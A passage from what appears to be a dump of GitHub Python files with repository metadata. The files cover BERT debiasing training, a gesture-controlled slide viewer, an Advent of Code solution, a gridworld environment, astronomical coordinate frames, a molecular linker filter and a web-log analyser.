(loss_ema / (1 - decay**total_steps))\n pbar.set_description(descript, refresh=False)\n\n if n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n\n if args.fp16:\n optimizer.backward(loss)\n else:\n loss.backward()\n\n tr_loss += loss.item()\n nb_tr_examples += input_ids.size(0)\n nb_tr_steps += 1\n if (step + 1) % args.gradient_accumulation_steps == 0:\n if args.fp16:\n # modify learning rate with special warm up BERT uses\n # if args.fp16 is False, BertAdam is used that handles this automatically\n lr_this_step = args.learning_rate * warmup_linear(global_step / num_train_optimization_steps,\n args.warmup_proportion)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr_this_step\n optimizer.step()\n optimizer.zero_grad()\n global_step += 1\n\n # Save a trained model and the associated configuration\n model_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n output_model_file = os.path.join(output_dir, WEIGHTS_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n output_config_file = os.path.join(output_dir, CONFIG_NAME)\n with open(output_config_file, 'w') as f:\n f.write(model_to_save.config.to_json_string())\n\n # Record the args as well\n arg_dict = {}\n for arg in vars(args):\n arg_dict[arg] = getattr(args, arg)\n with open(join(output_dir, \"args.json\"), 'w') as out_fh:\n json.dump(arg_dict, out_fh)\n\n # Load a trained model and config that you have fine-tuned\n config = BertConfig(output_config_file)\n model = BertWithDebiasLoss(config, num_labels=3, loss_fn=loss_fn)\n model.load_state_dict(torch.load(output_model_file))\n else:\n output_config_file = os.path.join(output_dir, CONFIG_NAME)\n config = BertConfig.from_json_file(output_config_file)\n output_model_file = os.path.join(output_dir, WEIGHTS_NAME)\n model = BertWithDebiasLoss(config, num_labels=3, loss_fn=loss_fn)\n model.load_state_dict(torch.load(output_model_file))\n\n model.to(device)\n\n if not args.do_eval:\n return\n if not (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n return\n\n model.eval()\n\n eval_datasets = [(\"dev\", load_mnli(False)), (\"hans\", load_hans())]\n for name, eval_examples in eval_datasets:\n logging.info(\"***** Running evaluation on %s *****\" % name)\n logging.info(\" Num examples = %d\", len(eval_examples))\n logging.info(\" Batch size = %d\", args.eval_batch_size)\n eval_features = convert_examples_to_features(\n eval_examples, args.max_seq_length, tokenizer)\n eval_features.sort(key=lambda x: len(x.input_ids))\n all_label_ids = np.array([x.label_id for x in eval_features])\n eval_dataloader = build_eval_dataloader(eval_features, args.eval_batch_size)\n\n eval_loss = 0\n nb_eval_steps = 0\n probs = []\n\n for input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\", ncols=100):\n input_ids = input_ids.to(device)\n input_mask = input_mask.to(device)\n segment_ids = segment_ids.to(device)\n label_ids = label_ids.to(device)\n\n with torch.no_grad():\n logits = model(input_ids, segment_ids, input_mask)\n\n # create eval loss and other metric required by the task\n loss_fct = CrossEntropyLoss()\n tmp_eval_loss = loss_fct(logits.view(-1, 3), label_ids.view(-1))\n\n eval_loss += tmp_eval_loss.mean().item()\n nb_eval_steps += 1\n probs.append(torch.nn.functional.softmax(logits, 1).detach().cpu().numpy())\n\n probs = np.concatenate(probs, 0)\n eval_loss = eval_loss / nb_eval_steps\n\n if name == \"hans\":\n probs[:, 0] += probs[:, 2]\n probs = probs[:, :2]\n\n preds = np.argmax(probs, axis=1)\n\n result = {\"acc\": simple_accuracy(preds, all_label_ids)}\n loss = tr_loss / nb_tr_steps if args.do_train else None\n\n result['eval_loss'] = eval_loss\n result['global_step'] = global_step\n result['loss'] = loss\n\n output_eval_file = os.path.join(output_dir, \"eval_%s_results.txt\" % name)\n with open(output_eval_file, \"w\") as writer:\n logging.info(\"***** Eval results *****\")\n for key in sorted(result.keys()):\n logging.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n\n output_answer_file = os.path.join(output_dir, \"eval_%s_answers.json\" % name)\n answers = {ex.example_id: [float(x) for x in p] for ex,p in zip(eval_features, probs)}\n with open(output_answer_file, \"w\") as f:\n json.dump(answers, f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chrisc36/debias","sub_path":"debias/bert/train_bert.py","file_name":"train_bert.py","file_ext":"py","file_size_in_byte":26020,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"3391530961","text":"import os\n\nimport cv2\nfrom cvzone.HandTrackingModule import HandDetector\nimport numpy as np\n\n# Variables\nwidth, height = 1280, 720\n\nfolderPath = \"presentation\"\n\ncap = cv2.VideoCapture(0)\ncap.set(3, width)\ncap.set(4, height)\n\n\npathImages = sorted(os.listdir(folderPath), key=len)\n\n#variables\nimgNumber = 0\nhs, ws, = int(120*1), int(213*1)\ngestureThreshold = 300\n\nbuttonPress = False\nbuttonCounter = 0\nbuttonDelay = 10\nannotations = [[]]\nann_counter = -1\nann_start = False\n\ndetector = HandDetector(detectionCon=0.8, maxHands=1)\n\n\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img, 1)\n\n pathFullImage = os.path.join(folderPath, pathImages[imgNumber])\n imgCurrent = cv2.imread(pathFullImage)\n\n hands, img = detector.findHands(img)\n cv2.line(img, (0, gestureThreshold), (width, gestureThreshold), (0, 255, 0), 10)\n\n if hands and not buttonPress:\n hand = hands[0]\n fingers = detector.fingersUp(hand)\n cx,cy = hand['center']\n\n lmList = hand['lmList']\n\n #constrain values for easier drawing\n indexFinger = lmList[8][0], lmList[8][1]\n xVal = int(np.interp(lmList[8][0], [width//2, w-50], [0, width]))\n yVal = int(np.interp(lmList[8][1], [200, height-200], [0, h]))\n indexFinger = xVal, yVal\n\n #Gestures\n if cy <= gestureThreshold:\n ann_start = False\n #Gesture 1 - Left slide\n if fingers == [1, 0, 0, 0, 0]:\n ann_start = False\n if imgNumber > 0:\n print('left')\n annotations = [[]]\n ann_counter = -1\n buttonPress = True\n imgNumber -= 1\n\n #Gesture 2 - Right slide\n if fingers == [0, 0, 0, 0, 1]:\n ann_start = False\n if imgNumber < len(pathImages) - 1:\n print('right')\n annotations = [[]]\n ann_counter = -1 \n buttonPress = True\n imgNumber += 1\n \n #Gesture 3 - show pointer\n if fingers == [0, 1, 1, 0, 0]:\n cv2.circle(imgCurrent, indexFinger, 12, (0, 0, 255), cv2.FILLED)\n ann_start = False\n \n # Gesture 4 - draw\n if fingers == [0, 1, 0, 0, 0]:\n if not ann_start:\n ann_start = True\n ann_counter += 1\n annotations.append([])\n cv2.circle(imgCurrent, indexFinger, 12, (0, 0, 255), cv2.FILLED)\n annotations[ann_counter].append(indexFinger)\n else:\n ann_start = False\n \n #Gesture 5 - erase\n if fingers == [0, 1, 1, 1, 0]:\n if annotations:\n annotations.pop(-1)\n if ann_counter > 0:\n ann_counter -= 1\n buttonPress = True\n \n # Gesture 5 - erase\n if fingers == [0, 1, 1, 1, 1]:\n annotations = [[]]\n ann_counter = 0\n buttonPress = True\n else:\n ann_start = False\n\n #button press delay mechanic\n if buttonPress:\n buttonCounter += 1\n if buttonCounter > buttonDelay:\n buttonCounter = 0\n buttonPress = False\n\n for i in range(len(annotations)):\n for j in range(len(annotations[i])):\n if j != 0:\n cv2.line(imgCurrent, annotations[i][j-1], annotations[i][j], (0, 0, 200), 12)\n\n imgSmall = cv2.resize(img, (ws, hs))\n h, w, _ = imgCurrent.shape\n imgCurrent[0:hs, w-ws:w] = imgSmall\n\n cv2.imshow(\"Presentation\", imgCurrent)\n cv2.imshow(\"Image\", img)\n\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n","repo_name":"aryan0821/gesture-presentation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5550783030","text":"#In[0]\nimport pandas as pd\nsignals = pd.read_table(\"input8.txt\", sep=' \\\\| | ', header=None, engine='python')\n#In[1]\ncheck_values = [2, 3, 4, 7]\npart1 = 0\nfor outputs in signals.values[:,10:14]:\n for output in outputs:\n if len(output) in check_values:\n part1 += 1\nprint(\"Solution to part 1: \", part1)\n#In[2]\nrunning_running_total = 0\nfor entry in signals.values:\n for signal in entry:\n if len(signal) == 2:\n cf = list(signal)\n elif len(signal) == 4:\n bd = list(signal)\n elif len(signal) == 3:\n a = list(signal)\n a = [element for element in a if element not in bd]\n bd = [element for element in bd if element not in cf]\n eg = [element for element in 'abcdefg' if element not in cf+a+bd]\n #Consider this decrypting the substitution cipher. Please\n running_total = ''\n for codes in entry[10:14]:\n if len(codes) == 2:\n running_total += '1'\n elif len(codes) == 3:\n running_total += '7'\n elif len(codes) == 4:\n running_total += '4'\n elif len(codes) == 5:\n if cf[0] in codes and cf[1] in codes:\n running_total += '3'\n elif not(bd[0] in codes and bd[1] in codes):\n running_total += '2'\n else:\n running_total += '5'\n elif len(codes) == 6:\n if not(cf[0] in codes) or not(cf[1] in codes):\n running_total += '6'\n elif not(bd[0] in codes) or not(bd[1] in codes):\n running_total += '0'\n else:\n running_total += '9'\n else:\n running_total += '8'\n running_running_total += int(running_total)\nprint(\"Solution to part 2: \", running_running_total)\n\n# %%\n","repo_name":"bethsg/AOC_2021","sub_path":"Day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72863294772","text":"from onpolicy.envs.gridworld.gym_minigrid.minigrid import *\nfrom icecream import ic\nimport collections\nimport math\nfrom copy import deepcopy\n\nclass HumanEnv(MiniGridEnv):\n \"\"\"\n Environment in which the agent is instructed to go to a given object\n named using an English text string\n \"\"\"\n\n def __init__(\n self,\n num_agents=2,\n num_preies=2,\n num_obstacles=4,\n direction_alpha=0.5,\n use_direction_reward = False,\n use_human_command=False,\n coverage_discounter=0.1,\n size=19\n ):\n self.size = size\n self.num_preies = num_preies\n self.use_direction_reward = use_direction_reward\n self.direction_alpha = direction_alpha\n self.use_human_command = use_human_command\n self.coverage_discounter = coverage_discounter\n # initial the covering rate\n self.covering_rate = 0\n # Reduce obstacles if there are too many\n if num_obstacles <= size/2 + 1:\n self.num_obstacles = int(num_obstacles)\n else:\n self.num_obstacles = int(size/2)\n\n super().__init__(\n num_agents=num_agents,\n grid_size=size,\n max_steps=math.floor(((size-2)**2) / num_agents * 2),\n # Set this to True for maximum speed\n see_through_walls=True\n )\n\n def _gen_grid(self, width, height):\n # Create the grid\n self.grid = Grid(width, height)\n\n # Generate the surrounding walls\n self.grid.horz_wall(0, 0)\n self.grid.horz_wall(0, height - 1)\n self.grid.vert_wall(0, 0)\n self.grid.vert_wall(width - 1, 0)\n\n room_w = width // 2\n room_h = height // 2\n\n # For each row of rooms\n for j in range(0, 2):\n\n # For each column\n for i in range(0, 2):\n xL = i * room_w\n yT = j * room_h\n xR = xL + room_w\n yB = yT + room_h\n\n # Bottom wall and door\n if i + 1 < 2:\n self.grid.vert_wall(xR, yT, room_h)\n pos = (xR, self._rand_int(yT + 1, yB))\n self.grid.set(*pos, None)\n\n # Bottom wall and door\n if j + 1 < 2:\n self.grid.horz_wall(xL, yB, room_w)\n pos = (self._rand_int(xL + 1, xR), yB)\n self.grid.set(*pos, None)\n\n # initial the cover_grid\n self.cover_grid = np.zeros([width,height])\n for j in range(0, height):\n for i in range(0, width):\n if self.grid.get(i,j) != None and self.grid.get(i,j).type == 'wall':\n self.cover_grid[j,i] = 1.0\n self.cover_grid_initial = self.cover_grid.copy()\n self.num_none = collections.Counter(self.cover_grid_initial.flatten())[0.]\n # import pdb; pdb.set_trace()\n\n # Types and colors of objects we can generate\n types = ['key']\n\n objs = []\n objPos = []\n\n # Until we have generated all the objects\n while len(objs) < self.num_preies:\n objType = self._rand_elem(types)\n objColor = self._rand_elem(COLOR_NAMES)\n\n # If this object already exists, try again\n if (objType, objColor) in objs:\n continue\n\n if objType == 'key':\n obj = Key(objColor)\n elif objType == 'box':\n obj = Box(objColor)\n elif objType == 'ball':\n obj = Ball(objColor)\n\n pos = self.place_obj(obj)\n objs.append((objType, objColor))\n objPos.append(pos)\n\n # Place obstacles\n self.obstacles = []\n for i_obst in range(self.num_obstacles):\n self.obstacles.append(Obstacle())\n pos = self.place_obj(self.obstacles[i_obst], max_tries=100)\n\n self.occupy_grid = self.grid.copy()\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Choose a random object to be picked up\n objIdx = self._rand_int(0, len(objs))\n self.targetType, self.target_color = objs[objIdx]\n self.target_pos = objPos[objIdx]\n \n # direction\n array_direction = np.array([[0,1], [0,-1], [1,0], [-1,0], [1,1], [1,-1], [-1,1], [-1,-1]])\n self.direction = []\n self.direction_encoder = []\n self.direction_index = []\n for agent_id in range(self.num_agents):\n center_pos = np.array([int((self.size-1)/2),int((self.size-1)/2)])\n direction = np.sign(center_pos - self.agent_pos[agent_id])\n direction_index = np.argmax(np.all(np.where(array_direction == direction, True, False), axis=1))\n direction_encoder = np.eye(8)[direction_index]\n self.direction_index.append(direction_index)\n self.direction.append(direction)\n self.direction_encoder.append(direction_encoder)\n\n # text\n descStr = '%s %s' % (self.target_color, self.targetType)\n self.mission = 'go to the %s' % descStr\n # print(self.mission)\n\n def step(self, action):\n obs, reward, done, info = MiniGridEnv.step(self, action)\n \n rewards = []\n\n for agent_id in range(self.num_agents):\n ax, ay = self.agent_pos[agent_id]\n tx, ty = self.target_pos\n if self.cover_grid[ay,ax] == 0:\n reward += self.coverage_discounter\n self.cover_grid[ay, ax] = 1.0\n self.covering_rate = collections.Counter((self.cover_grid - self.cover_grid_initial).flatten())[1] / self.num_none\n\n # if abs(ax - tx) < 1 and abs(ay - ty) < 1:\n # reward += 1.0 \n # self.num_reach_goal += 1\n # # done = True\n \n rewards.append(reward)\n\n rewards = [[np.sum(rewards)]] * self.num_agents\n\n dones = [done for agent_id in range(self.num_agents)]\n \n info['num_reach_goal'] = self.num_reach_goal\n info['covering_rate'] = self.covering_rate\n info['num_same_direction'] = self.num_same_direction\n\n return obs, rewards, dones, info\n\n\n\n","repo_name":"yang-xy20/async_mappo","sub_path":"onpolicy/envs/gridworld/gym_minigrid/envs/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7721796032","text":"from astropy import units as u\nfrom astropy.coordinates import (\n GCRS as _GCRS,\n HCRS as _HCRS,\n ICRS as _ICRS,\n AffineTransform,\n BaseRADecFrame,\n CartesianDifferential,\n FunctionTransformWithFiniteDifference,\n TimeAttribute,\n UnitSphericalRepresentation,\n frame_transform_graph,\n get_body_barycentric,\n get_body_barycentric_posvel,\n)\nfrom astropy.coordinates.builtin_frames.utils import DEFAULT_OBSTIME\nimport numpy as np\n\nfrom poliastro.bodies import (\n Jupiter,\n Mars,\n Mercury,\n Moon,\n Neptune,\n Saturn,\n Uranus,\n Venus,\n)\n\n__all__ = [\n \"ICRS\",\n \"HCRS\",\n \"MercuryICRS\",\n \"VenusICRS\",\n \"GCRS\",\n \"MarsICRS\",\n \"JupiterICRS\",\n \"SaturnICRS\",\n \"UranusICRS\",\n \"NeptuneICRS\",\n]\n\n# HACK: sphinx-autoapi variable definition\nICRS = _ICRS\nHCRS = _HCRS\nGCRS = _GCRS\n\n\nclass _PlanetaryICRS(BaseRADecFrame):\n obstime = TimeAttribute(default=DEFAULT_OBSTIME)\n\n def __new__(cls, *args, **kwargs):\n frame_transform_graph.transform(AffineTransform, cls, ICRS)(\n cls.to_icrs\n )\n frame_transform_graph.transform(AffineTransform, ICRS, cls)(\n cls.from_icrs\n )\n frame_transform_graph.transform(\n FunctionTransformWithFiniteDifference, cls, cls\n )(cls.self_transform)\n\n return super().__new__(cls)\n\n @staticmethod\n def to_icrs(planet_coo, _):\n # This is just an origin translation so without a distance it cannot go ahead\n if isinstance(planet_coo.data, UnitSphericalRepresentation):\n raise u.UnitsError(\n _NEED_ORIGIN_HINT.format(planet_coo.__class__.__name__)\n )\n\n if planet_coo.data.differentials:\n bary_sun_pos, bary_sun_vel = get_body_barycentric_posvel(\n planet_coo.body.name, planet_coo.obstime\n )\n bary_sun_pos = bary_sun_pos.with_differentials(\n bary_sun_vel.represent_as(CartesianDifferential)\n )\n\n else:\n bary_sun_pos = get_body_barycentric(\n planet_coo.body.name, planet_coo.obstime\n )\n bary_sun_vel = None\n\n return None, bary_sun_pos\n\n @staticmethod\n def from_icrs(icrs_coo, planet_frame):\n # This is just an origin translation so without a distance it cannot go ahead\n if isinstance(icrs_coo.data, UnitSphericalRepresentation):\n raise u.UnitsError(\n _NEED_ORIGIN_HINT.format(icrs_coo.__class__.__name__)\n )\n\n if icrs_coo.data.differentials:\n bary_sun_pos, bary_sun_vel = get_body_barycentric_posvel(\n planet_frame.body.name, planet_frame.obstime\n )\n # Beware! Negation operation is not supported for differentials\n bary_sun_pos = (-bary_sun_pos).with_differentials(\n -bary_sun_vel.represent_as(CartesianDifferential)\n )\n\n else:\n bary_sun_pos = -get_body_barycentric(\n planet_frame.body.name, planet_frame.obstime\n )\n bary_sun_vel = None\n\n return None, bary_sun_pos\n\n @staticmethod\n def self_transform(from_coo, to_frame):\n if np.all(from_coo.obstime == to_frame.obstime):\n return to_frame.realize_frame(from_coo.data)\n else:\n # Like CIRS, we do this self-transform via ICRS\n return from_coo.transform_to(ICRS).transform_to(to_frame)\n\n\nclass MercuryICRS(_PlanetaryICRS):\n body = Mercury\n\n\nclass VenusICRS(_PlanetaryICRS):\n body = Venus\n\n\nclass MarsICRS(_PlanetaryICRS):\n body = Mars\n\n\nclass JupiterICRS(_PlanetaryICRS):\n body = Jupiter\n\n\nclass SaturnICRS(_PlanetaryICRS):\n body = Saturn\n\n\nclass UranusICRS(_PlanetaryICRS):\n body = Uranus\n\n\nclass NeptuneICRS(_PlanetaryICRS):\n body = Neptune\n\n\nclass MoonICRS(_PlanetaryICRS):\n body = Moon\n\n\n_NEED_ORIGIN_HINT = (\n \"The input {0} coordinates do not have length units. This \"\n \"probably means you created coordinates with lat/lon but \"\n \"no distance. PlanetaryICRS<->ICRS transforms cannot \"\n \"function in this case because there is an origin shift.\"\n)\n","repo_name":"poliastro/poliastro","sub_path":"src/poliastro/frames/equatorial.py","file_name":"equatorial.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":806,"dataset":"github-code","pt":"21"} +{"seq_id":"20885372815","text":"\nfrom rdkit import Chem\nfrom rdkit.Chem import Descriptors\nfrom rdkit import DataStructs\nimport re\nfrom rdkit import RDLogger\nfrom rdkit.Chem import AllChem\nRDLogger.DisableLog('rdApp.*')\n\nimport argparse\nimport numpy as np\nimport operator\n\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', '--ifile', type=str, required=True,\n help='generation_linker_descriptor.tsv')\nparser.add_argument('-o', '--ofile', type=str, required=True,\n help='')\nargs = parser.parse_args()\n\n\n\n\ndef pass_filter(linker_, natoms_):\n print(Chem.rdMolDescriptors.CalcNumHeteroatoms(Chem.MolFromSmiles('*')))\n mol = Chem.MolFromSmiles(linker_)\n keep = True\n if mol is not None:\n n_aliphatic_ring = Descriptors.NumAliphaticRings(mol)\n n_aromatic_ring = Descriptors.NumAromaticRings(mol)\n n_ring = (max(n_aliphatic_ring, n_aromatic_ring))\n #print('n_aliphatic_ring', n_aliphatic_ring)\n #print('n_aromatic_ring', n_aromatic_ring)\n if n_ring < 1:\n n_heteroatoms = Chem.rdMolDescriptors.CalcNumHeteroatoms(mol) - 2 # remove attachments *\n # should be\n # no significant change in R1 selection: 141125 --> 141049\n #n_heteroatoms = Chem.rdMolDescriptors.CalcNumHeteroatoms(mol) - linker_.count('*') # remove attachments *\n\n if n_heteroatoms < 1:\n bonds_type = [b.GetBondType() for b in mol.GetBonds()]\n #print(bonds_type)\n if all([btype == Chem.rdchem.BondType.SINGLE for btype in bonds_type]) and natoms_ > 2:\n keep = False\n\n return keep\n\n\n\n\n\n\n\ndiscarded = []\nwith open(args.ifile, 'r') as f:\n for l in f:\n if l.startswith('gen'):\n continue\n cols = l.split('\\n')[0].split('\\t')\n gen = cols[0]\n gen_id = int(cols[1])\n gen_atom = int(cols[7])\n linker = cols[8]\n rot = int(cols[9])\n atom = int(cols[10])\n if gen_atom < atom: # wrong linkers including fragments\n #print(gen, '\\t', linker)\n continue\n\n \n if rot == atom-1 and atom > 3: # purely linear linkers\n discarded.append((gen_id, gen, linker))\n #print(gen, linker)\n #continue\n\n\n if not pass_filter(linker, atom): # not purely linear but no ring or no heteroatom\n # branched linkers only composed of more than 3 carbon atoms\n discarded.append((gen_id, gen, linker)) \n #print(gen, linker)\n #continue\nprint('discarded', len(discarded))\n\n\n\nwith open(args.ofile, 'w') as of:\n of.write('gen_id\\tgen\\tlinker\\n')\n for gen_id, gen, linker in discarded:\n of.write('{}\\t{}\\t{}\\n'.format(gen_id, gen, linker))\n\n","repo_name":"kimeguida/POEM","sub_path":"scripts/filter_linker.py","file_name":"filter_linker.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"36152505477","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# author:wttree\n# datetime:2018/10/20 21:53\n# software: PyCharm\n# question: 旋转数组的最小数字\n\n'''\n把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。\n输入一个递增排序的数组的一个旋转,输出旋转数组的最小元素。\n例如数组{3,4,5,1,2}为{1,2,3,4,5}的一个旋转,该数组的最小值为1。\nNOTE:给出的所有元素都大于0,若数组大小为0,请返回0。\n'''\n'''\n 采用二分法解答这个问题,\nmid = low + (high - low)/2\n需要考虑三种情况:\n(1)array[mid] > array[high]:\n出现这种情况的array类似[3,4,5,6,0,1,2],此时最小数字一定在mid的右边。\nlow = mid + 1\n(2)array[mid] == array[high]:\n出现这种情况的array类似 [1,0,1,1,1] 或者[1,1,1,0,1],此时最小数字不好判断在mid左边\n还是右边,这时只好一个一个试 ,\nhigh = high - 1\n(3)array[mid] < array[high]:\n出现这种情况的array类似[2,2,3,4,5,6,6],此时最小数字一定就是array[mid]或者在mid的左\n边。因为右边必然都是递增的。\nhigh = mid\n注意这里有个坑:如果待查询的范围最后只剩两个数,那么mid 一定会指向下标靠前的数字\n比如 array = [4,6]\narray[low] = 4 ;array[mid] = 4 ; array[high] = 6 ;\n如果high = mid - 1,就会产生错误, 因此high = mid\n但情形(1)中low = mid + 1就不会错误 \n'''\nclass Solution:\n\n #v1.0将非减排序视为递增或者不变的,最小值只可能出现在第一个或者旋转开始的位置\n #663ms 5732k\n def minNumberInRotateArray(self, rotateArray):\n if rotateArray == []:\n return 0\n min = rotateArray[0]\n for i in range(1, len(rotateArray)):\n if rotateArray[i] < min:\n min = rotateArray[i]\n return min\n return min\n\n #551ms5856k\n '''\n 二分查找的变形,注意到旋转数组的首元素肯定不小于旋转数组的尾元素,设置中间点。\n 如果中间点大于首元素,说明最小数字在后面一半,如果中间点小于尾元素,说明最小数字在前一半。\n 依次循环。同时,当一次循环中首元素小于尾元素,说明最小值就是首元素。\n 但是当首元素等于尾元素等于中间值,只能在这个区域顺序查找。\n '''\n def minNumberInRotateArray2(self, rotateArray):\n if len(rotateArray) == 0:\n return 0\n front = 0\n rear = len(rotateArray) -1\n minVal = rotateArray[0]\n\n #v2.0判定第一项是否小于最后一项,如果是即为递增,直接返回第一项\n if rotateArray[front] < rotateArray[rear]:\n return rotateArray[front]\n else:\n #利用二分法寻找旋转的点\n while(rear - front)> 1:\n mid = (rear+front)//2\n if rotateArray[mid] > rotateArray[rear]:\n front = mid\n elif rotateArray[mid] < rotateArray[front]:\n rear = mid\n elif rotateArray[mid] == rotateArray[front] and rotateArray[front] == rotateArray[rear]:\n for i in range(front, rear):\n if rotateArray[i] < minVal:\n minVal = rotateArray[i]\n rear = i\n minVal = rotateArray[rear]\n return minVal\n\n\n #v3.0实例方法572ms 9032k\n def minNumberInRotateArray3(self, rotateArray):\n if len(rotateArray) == 0:\n return 0\n front = 0\n rear = len(rotateArray) - 1\n midIndex = 0\n while rotateArray[front] >= rotateArray[rear]:\n if rear - front == 1:\n midIndex = rear\n break\n midIndex = (front+rear)//2\n if rotateArray[front] == rotateArray[rear] and rotateArray[front] == rotateArray[midIndex]:\n return self.MinInOrder(rotateArray, front, rear)\n if rotateArray[midIndex] >= rotateArray[front]:\n front = midIndex\n elif rotateArray[midIndex] <= rotateArray[rear]:\n rear = midIndex\n return rotateArray[midIndex]\n\n #递归求最小数字序列数字\n def MinInOrder(self, array, front, end):\n result = array[0]\n for i in array[front: end+1]:\n if i6:\r\n nlevel=1 ### \r\n iphost = m[0] # ip / hostname\r\n actime = m[3] # access time\r\n crequest = m[4] # resource required by client\r\n cstatus = m[5] # client status\r\n csize = m[6] # object size sent to client\r\n #print(\"iphost, access time, status, size=\",iphost,actime,cstatus,csize)\r\n\r\n rlist = crequest.split()\r\n tlist = actime.split()\r\n if (len(actime)==26)&(len(rlist)>2)&(csize.isdigit()==True)&(len(tlist)==2)&(cstatus.isdigit()==True):\r\n nlevel=2 ###\r\n resource = rlist[1] # 0='GET' 1='/...jpg' 2='HTTP1.0/...'\r\n #print('resource=', resource, ' size=',csize)\r\n status = int(cstatus)\r\n # epoch time\r\n hour1 = tlist[0] # 0='01/Jul/1995:00:00:01' 1='-0400'\r\n #print('hour =', hour1[:-6], end='') # '01/Jul/1995:00'\r\n if len(hour1)==20:\r\n nlevel=3 ###\r\n hour2 = hour1[:-6]\r\n tfmt2 = '%d/%b/%Y:%H:%M:%S' # %b=Jul, Aug, ...\r\n epoch_time = datetime_to_epoch(hour1, tfmt2)\r\n \r\n #else:\r\n #print(\"*** error in convert ***\")\r\n\r\n #else:\r\n #print(\"** error in word parser **\")\r\n\r\n #else:\r\n #print(\"* error in line parser *\")\r\n\r\n #print(nlevel)\r\n if nlevel==3: # ok\r\n #1 hosts.txt\r\n if iphost in fdic1:\r\n n = fdic1[iphost]\r\n del fdic1[iphost]\r\n fdic1[iphost] = n + 1 # Access# n++\r\n else:\r\n fdic1[iphost] = 1 # append the host\r\n \r\n #2 resources.txt\r\n if resource in fdic2:\r\n n = fdic2[resource]\r\n del fdic2[resource]\r\n fdic2[resource] = n + int(csize) # Bandwidth += csize\r\n elif resource != '/':\r\n fdic2[resource] = int(csize) # append the resource\r\n \r\n #3 hours.txt\r\n if hour2 in fdic3:\r\n n = fdic3[hour2]\r\n del fdic3[hour2]\r\n fdic3[hour2] = n + 1 # Access# n++\r\n else:\r\n fdic3[hour2] = 1 # append the hour\r\n\r\n #4 blocked.txt # status=401,HTTP_UNAUTHORIZED \r\n #4-1 release by normal login\r\n if status<400:\r\n for i in range(0, len(blk_host)-1):\r\n if blk_host[i]==iphost: # normal login\r\n blk_host.pop(i)\r\n blk_n.pop(i)\r\n blk_epoch.pop(i)\r\n\r\n #4-2 register by login failure\r\n if status>=400:\r\n if blk_host.count(iphost)==0: # Append new blk_host\r\n blk_host.append(iphost)\r\n blk_n.append(int(1))\r\n blk_epoch.append(epoch_time)\r\n else:\r\n i = blk_host.index(iphost)\r\n blk_n[i] += 1 # Access# n++\r\n if blk_n[i] > 2: # There are 3 times of login failure\r\n if (epoch_time - blk_epoch[i])>20: # 20 second window\r\n blk_host.pop(i)\r\n blk_n.pop(i)\r\n blk_epoch.pop(i)\r\n else:\r\n #4 blocked.txt\r\n with open(fout4,'a') as fw4:\r\n fmt4_msg = '%s: %s\\n' % (iphost, epoch_to_datetime(blk_epoch[i]))\r\n fw4.write(fmt4_msg)\r\n \r\n blk_host.pop(i)\r\n blk_n.pop(i)\r\n blk_epoch.pop(i)\r\n\r\n line = fr.readline()\r\n nline+=1\r\n #if nline>500000: break #=== stop the loop to limit the number of events ===#\r\n # Event Loop: End\r\n\r\n #=== Output Files for Feature 1,2,3\r\n #1 hosts.txt\r\n #sdic1= sorted(fdic1.items(), key=lambda x:x[0], reverse=True) # sort by key\r\n sdic1 = sorted(fdic1.items(), key=itemgetter(1), reverse=True) # sort by value\r\n \r\n with open(fout1,'w') as fw1:\r\n fw1.write('#: hostname, # of access\\n')\r\n n1=0\r\n for k, v in sdic1:\r\n n1+=1\r\n #print(k,v)\r\n fmt1_msg = '%d: %s,%d\\n' % (n1, k, v)\r\n #print(fmt1_msg)\r\n fw1.write(fmt1_msg)\r\n if n1>9: break # Top 10\r\n \r\n #2 resources.txt\r\n sdic2 = sorted(fdic2.items(), key=itemgetter(1), reverse=True) # sort by value\r\n \r\n with open(fout2,'w') as fw2:\r\n fw2.write('#: resource, total bytes\\n')\r\n n2=0\r\n for k, v in sdic2:\r\n n2+=1\r\n #print(k,v)\r\n fmt2_msg = '%d: %s,%d\\n' % (n2, k, v)\r\n #print(fmt2_msg)\r\n fw2.write(fmt2_msg)\r\n if n2>9: break # Top 10\r\n \r\n #3 hours.txt\r\n sdic3 = sorted(fdic3.items(), key=itemgetter(1), reverse=True) # sort by value\r\n \r\n with open(fout3,'w') as fw3:\r\n fw3.write('#: date:hour, # of access in 60 minutes\\n')\r\n n3=0\r\n for k, v in sdic3:\r\n n3+=1\r\n #print(k,v)\r\n fmt3_msg = '%d: %s,%d\\n' % (n3, k, v)\r\n #print(fmt3_msg)\r\n fw3.write(fmt3_msg)\r\n if n3>9: break # Top 10\r\n\r\n #4 blocked.txt\r\n # this file is written in the event loop.\r\n\r\n return name \r\n\r\n# Main Routine: Begin\r\nfilename='./log_input/log.txt' # Input filename\r\nf1='./log_output/hosts.txt' # Feature 1: top 10 most active hosts/IP addresses that have accessed the site\r\nf2='./log_output/resources.txt' # 